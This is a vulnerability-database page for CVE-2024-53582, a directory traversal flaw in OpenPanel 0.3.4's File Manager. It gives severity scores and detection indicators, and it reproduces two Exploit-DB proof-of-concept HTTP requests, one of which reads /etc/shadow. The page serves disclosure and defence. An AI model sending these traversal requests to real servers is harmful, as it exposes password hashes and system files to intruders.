CVE-2024-53582
published 2025-01-31CVE-2024-53582: An issue found in the Copy and View functions in the File Manager component of OpenPanel v0.3.4 allows attackers to execute a directory traversal via a crafted…
PriorityP357high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
3.15%
86.3th percentile
An issue found in the Copy and View functions in the File Manager component of OpenPanel v0.3.4 allows attackers to execute a directory traversal via a crafted HTTP request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openpanel | openpanel | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect directory traversal attempts targeting the OpenPanel File Manager via the /view_file endpoint with path_param values containing absolute paths outside the web root (e.g., /etc). ↗
- →Detect path traversal sequences (/../) in requests to the /files/ endpoint on OpenPanel port 2083, indicative of directory traversal exploitation. ↗
- →Monitor for requests to /view_file with filename=shadow, which indicates an attempt to read /etc/shadow via the directory traversal vulnerability. ↗
- →Flag HTTP requests to OpenPanel (port 2083) that include the X-Requested-With: XMLHttpRequest header combined with path traversal sequences in the URL path. ↗
- →Requests originating with Referer: https://demo.openpanel.org:2083/files/ combined with traversal patterns in the request path are characteristic of this exploit chain. ↗
- ·The exploit was tested against OpenPanel v0.3.4 specifically; other versions may or may not be vulnerable. Scope detection rules accordingly. ↗
- ·The exploit was demonstrated against a live demo host (demo.openpanel.org:2083); production deployments may use different hostnames or ports, so detection should not be host-specific. ↗
- ·Two separate exploit vectors exist for CVE-2024-53582: the View function (/view_file endpoint) and the Copy function, as well as an Incorrect Access Control path traversal via /files/. Detection rules should cover both attack surfaces. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
exploitdb·2025-04-14·CVSS 7.5
CVE-2024-53582 [HIGH] OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
---
# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/file
Exploit-DB
OpenPanel 0.3.4 - Incorrect Access Control
exploitdb·2025-04-14·CVSS 7.5
CVE-2024-53582 [HIGH] OpenPanel 0.3.4 - Incorrect Access Control
OpenPanel 0.3.4 - Incorrect Access Control
---
# Exploit Title: OpenPanel 0.3.4 - Incorrect Access Control
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582
GET /files/../.. HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyEag.70MOWk6Q4cZWoRbciZO94dsGxgw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
P
No writeups or analysis indexed.
2025-01-31
Published